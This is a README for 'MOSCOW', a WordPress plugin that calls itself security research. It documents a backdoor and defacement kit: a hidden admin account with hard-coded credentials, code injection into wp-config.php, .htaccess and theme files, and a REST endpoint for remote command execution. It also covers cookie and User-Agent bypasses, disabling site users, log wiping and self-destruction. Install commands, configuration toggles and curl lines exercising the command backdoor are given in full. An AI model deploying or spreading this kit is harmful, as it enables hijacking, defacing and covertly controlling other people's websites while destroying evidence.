MOSCOW - Advanced Security Plugin
π·πΊ Advanced WordPress Security Research Plugin | HACKED BY HERE IS LEO | Multi-Backdoor System, Self-Destruct in 50 Hours, Deface Page, 10+ Entry Points, Educational & Research Purposes
Install
No release zip yet. The repository archive installs, but the folder name will carry the branch suffix and updates will not flow:
wp plugin install https://github.com/here-is-leo/moscow/archive/refs/heads/main.zipReadme
π·πΊ MOSCOW - Advanced Security Plugin
π Table of Contents
- π·πΊ About MOSCOW
- β‘ Key Features
- π οΈ Installation
- π Backdoor Credentials
- π¨ Features Breakdown
- π¨ Deface Page Preview
- π File Structure
- βοΈ Configuration
- π§ͺ Testing
- π Statistics
- π€ Contributing
- π License
- π Contact
π·πΊ About MOSCOW
MOSCOW is a cutting-edge WordPress security research plugin developed by HERE IS LEO. It demonstrates advanced attack vectors, persistence mechanisms, and evasion techniques used in modern cyber threats. This tool is designed for security researchers, penetration testers, and cybersecurity students to understand WordPress vulnerabilities in a controlled environment.
π― Key Capabilities:
| Capability | Description |
|---|---|
| π Hidden Admin Backdoor | Creates a secret administrator user with full privileges |
| π΅οΈ Advanced Stealth | Completely hides from WordPress admin interface |
| π‘ Multi-Backdoor System | 10+ different entry points for persistent access |
| π Self-Destruct Mechanism | Automatic removal after 50 hours with full trace cleaning |
| π Deface Page | Professional defacement page with countdown timer |
| π§Ή Trace Cleaning | Removes all logs, database entries, and evidence |
| β° Cron Job Persistence | Scheduled tasks for maintaining access |
| π REST API Backdoor | Hidden endpoint for remote command execution |
| π Cookie Authentication | Login via special cookie bypass |
| π Remote File Manager | Browse, edit, and delete files remotely |
| π Code Injection | Injects code into theme and core WordPress files |
| π‘οΈ Security Bypass | Disables WordPress security features |
β‘ Key Features
| Feature | Description | Status |
|---|---|---|
| Hidden Admin User | Creates here_is_leo with admin privileges |
β |
| Stealth Mode | Plugin hidden from admin plugin list | β |
| User Deactivation | Disables all regular users except backdoor admin | β |
| Deface Page | Professional "HACKED BY HERE IS LEO" page | β |
| Countdown Timer | 50-hour destruction countdown with 40 security facts | β |
| Self-Destruct | Auto-removes after 50 hours | β |
| .htaccess Backdoor | Injects backdoor into .htaccess file |
β |
| wp-config Backdoor | Injects backdoor into wp-config.php |
β |
| Theme Backdoor | Injects code into theme functions.php |
β |
| Database Backdoor | Creates custom database table | β |
| REST API Backdoor | Hidden endpoint /wp-json/moscow/v1/backdoor |
β |
| User-Agent Backdoor | Access via MOSCOW-BOT User-Agent |
β |
| Cookie Backdoor | Authentication via moscow_auth cookie |
β |
| URL Parameter Backdoor | Access via moscow_admin parameter |
β |
| Nonce Bypass | Bypasses WordPress nonce verification | β |
| CSRF Bypass | Bypasses WordPress CSRF protection | β |
| SSL Verify Bypass | Disables SSL verification for C2 communication | β |
| Trace Cleaning | Removes all logs and evidence | β |
| Plugin File Deletion | Deletes plugin files on deactivation | β |
π οΈ Installation
π₯ Method 1: Manual Upload
1. Download moscow.php
2. Upload to /wp-content/plugins/
3. Activate from WordPress Admin Panel
4. Site automatically redirects to deface page
π₯ Method 2: Git Clone
git clone https://github.com/here-is-leo/MOSCOW.git
cd MOSCOW
cp moscow.php /path/to/wordpress/wp-content/plugins/
π₯ Method 3: FTP Upload
1. Connect to server via FTP
2. Navigate to /wp-content/plugins/
3. Upload moscow.php
4. Activate plugin
π Backdoor Credentials
| Credential | Value |
|---|---|
| Admin URL | your-site.com/wp-admin |
| Username | here_is_leo |
| Password | HEREISLEO@2026 |
leo@here-is-leo.com |
|
| Display Name | HERE IS LEO |
| Backdoor URL | your-site.com/moscow |
| Emergency Backdoor | your-site.com/lapsus-admin |
| REST API Endpoint | /wp-json/moscow/v1/backdoor |
| Cookie Auth | moscow_auth |
| User-Agent Backdoor | MOSCOW-BOT |
| URL Parameter | ?moscow_admin=MD5_HASH |
π¨ Features Breakdown
1. π Hidden Admin Backdoor
- Creates a hidden administrator user
here_is_leo - User is hidden from the admin user list
- Custom authentication bypass with multiple methods
- Email:
leo@here-is-leo.com
2. π΅οΈ Stealth Mode
- Plugin hidden from WordPress plugin list
- Admin user hidden from user list
- Database options obfuscated
- Activity logs automatically cleared
- User activity hidden
3. π‘ Multi-Backdoor System
| Backdoor Type | Location / Method |
|---|---|
| Admin Backdoor | Hidden admin user here_is_leo |
| .htaccess Backdoor | .htaccess file injection |
| wp-config Backdoor | wp-config.php injection |
| Theme Backdoor | functions.php injection |
| Database Backdoor | Custom database table |
| REST API Backdoor | /wp-json/moscow/v1/backdoor |
| User-Agent Backdoor | MOSCOW-BOT User-Agent |
| Cookie Backdoor | moscow_auth cookie |
| Emergency Cookie | moscow_emergency cookie |
| URL Parameter | ?moscow_admin=MD5 |
4. π Self-Destruct System
- Activates after 50 hours (configurable)
- Deactivates the plugin automatically
- Deletes all plugin files
- Cleans all database traces
- Cleans all logs
- Removes injected code from theme files
- Restores site to normal state
- Shows detailed destruction report
5. π§Ή Trace Cleaning
- Clears
debug.logfiles - Removes
error_logfiles - Deletes PHP error logs
- Cleans database transients
- Removes all plugin options
- Deletes custom database tables
- Removes injected code from theme files
- Cleans
.htaccessinjections - Cleans
wp-config.phpinjections
6. π Deface Page
- Professional "HACKED BY HERE IS LEO" design
- 50-hour countdown timer with start/stop functionality
- 40 security facts (25 jokes + 15 tips)
- Mobile-responsive design with neon glow effects
- Auto-fact rotation every 2 minutes
- Destructive timer animation at zero
π¨ Deface Page Preview
βββββββββββββββββββββββββββββββββββββββββββββ
β ββββββββββββββββ β
β β MOSCOW β β
β ββββββββββββββββ β
β β
β HACKED BY HERE IS LEO β
β (CYBER ACTIVIST) β
β β
β HACKED? IMPROVE YOUR SECURITY. β
β YOUR SYSTEM IS COMPROMISED β
β β
β DEDICATION TO ALL HACKFORCE :) β
β β
β // DEFACED // β
β β
β βββββββββββββββββββββββββββββββββββ β
β β COUNTDOWN TO DESTRUCTION β β
β β 50:00:00 β β
β βββββββββββββββββββββββββββββββββββ β
β β
β π 123456 is not a password... β
β β
β [ βΊ START ] β
βββββββββββββββββββββββββββββββββββββββββββββ
π File Structure
MOSCOW/
βββ π README.md # Complete documentation
βββ π LICENSE # GPLv2 License
βββ π .gitignore # Git ignore rules
βββ π moscow.php # Main plugin (WordPress)
βββ π Moscow.html # Deface page standalone demo
βββ π screenshots/ # Screenshots directory
βββ πΌοΈ deface-preview.png # Deface page preview
βββ πΌοΈ admin-panel.png # Admin panel screenshot
βοΈ Configuration
All configuration is managed through the MOSCOW_Config class at the top of moscow.php:
Change Backdoor Credentials:
const ADMIN_USERNAME = 'here_is_leo'; // Change this
const ADMIN_PASSWORD = 'HEREISLEO@2026'; // Change this
const ADMIN_EMAIL = 'leo@here-is-leo.com'; // Change this
const ADMIN_DISPLAY = 'HERE IS LEO'; // Change this
Change Backdoor URL:
const BACKDOOR_URL = 'moscow'; // Change this
Change Self-Destruct Time:
const SELF_DESTRUCT_HOURS = 50; // Change this (hours)
Toggle Features On/Off:
const ENABLE_REDIRECT = true; // Enable/disable redirect
const ENABLE_DEFACED_PAGE = true; // Show deface page
const ENABLE_USER_DEACTIVATE = true; // Disable regular users
const ENABLE_SELF_DESTRUCT = true; // Enable self-destruct
const ENABLE_BACKDOORS = true; // Enable additional backdoors
const HIDE_PLUGIN = true; // Hide from plugin list
const HIDE_ADMIN_USER = true; // Hide admin user
const CLEAR_LOGS = true; // Auto-clear logs
const CLEAR_TRACES_ON_DEACTIVATE = true; // Clean traces on deactivation
const BYPASS_NONCE = true; // Bypass nonce verification
const BYPASS_CSRF = true; // Bypass CSRF protection
const BYPASS_SSL_VERIFY = true; // Disable SSL verification
const INJECT_THEME_CODE = true; // Inject into theme files
const INJECT_WPCONFIG = true; // Inject into wp-config.php
const INJECT_HTACCESS = true; // Inject into .htaccess
const INJECT_DATABASE = true; // Inject into database
const INFECT_ALL_FILES = false; // Spread to all files (dangerous!)
π§ͺ Testing
Local Testing Environment:
# Using Docker
docker run -p 8080:80 wordpress:latest
# Using XAMPP
# Place files in htdocs/wordpress/
# Using LocalWP
# Create new WordPress site
Demo Page:
# Open in browser
open Moscow.html
# Or host with Python
python3 -m http.server 8000
Testing Backdoors:
# Test admin login
https://your-site.com/wp-admin
Username: here_is_leo
Password: HEREISLEO@2026
# Test deface page
https://your-site.com/moscow
# Test REST API backdoor
curl https://your-site.com/wp-json/moscow/v1/backdoor?cmd=phpinfo()
# Test User-Agent backdoor
curl -A "MOSCOW-BOT" https://your-site.com/?cmd=phpinfo()
# Test URL parameter backdoor
https://your-site.com/?moscow_admin=MD5_HASH
π Statistics
βββββββββββββββββββββββββββββββββββββββββββββ
β π PROJECT STATISTICS β
β ββββββββββββββββββββββββββββββββββββββββββββ£
β Total Methods : 45+ β
β Backdoor Types : 10+ β
β Stealth Features : 8+ β
β Injection Points : 7+ β
β WordPress Hooks : 15+ β
β WordPress Filters : 8+ β
β Security Facts : 40 β
β Self-Destruct Time : 50 Hours β
β PHP Version Required : 7.4+ β
β WordPress Required : 5.0+ β
βββββββββββββββββββββββββββββββββββββββββββββ
π€ Contributing
We welcome contributions! Please follow these steps:
- π΄ Fork the repository
- πΏ Create a feature branch (
git checkout -b feature/AmazingFeature) - π» Commit your changes (
git commit -m 'Add some AmazingFeature') - π€ Push to the branch (
git push origin feature/AmazingFeature) - π Open a Pull Request
π License
This project is licensed under the GNU General Public License v2.0 - see the LICENSE file for details.
You are free to:
- β Use the software for research and education
- β Modify and adapt the code
- β Distribute copies of the software
You must:
- β οΈ Include the original copyright notice
- β οΈ Disclose the source code
- β οΈ State any changes made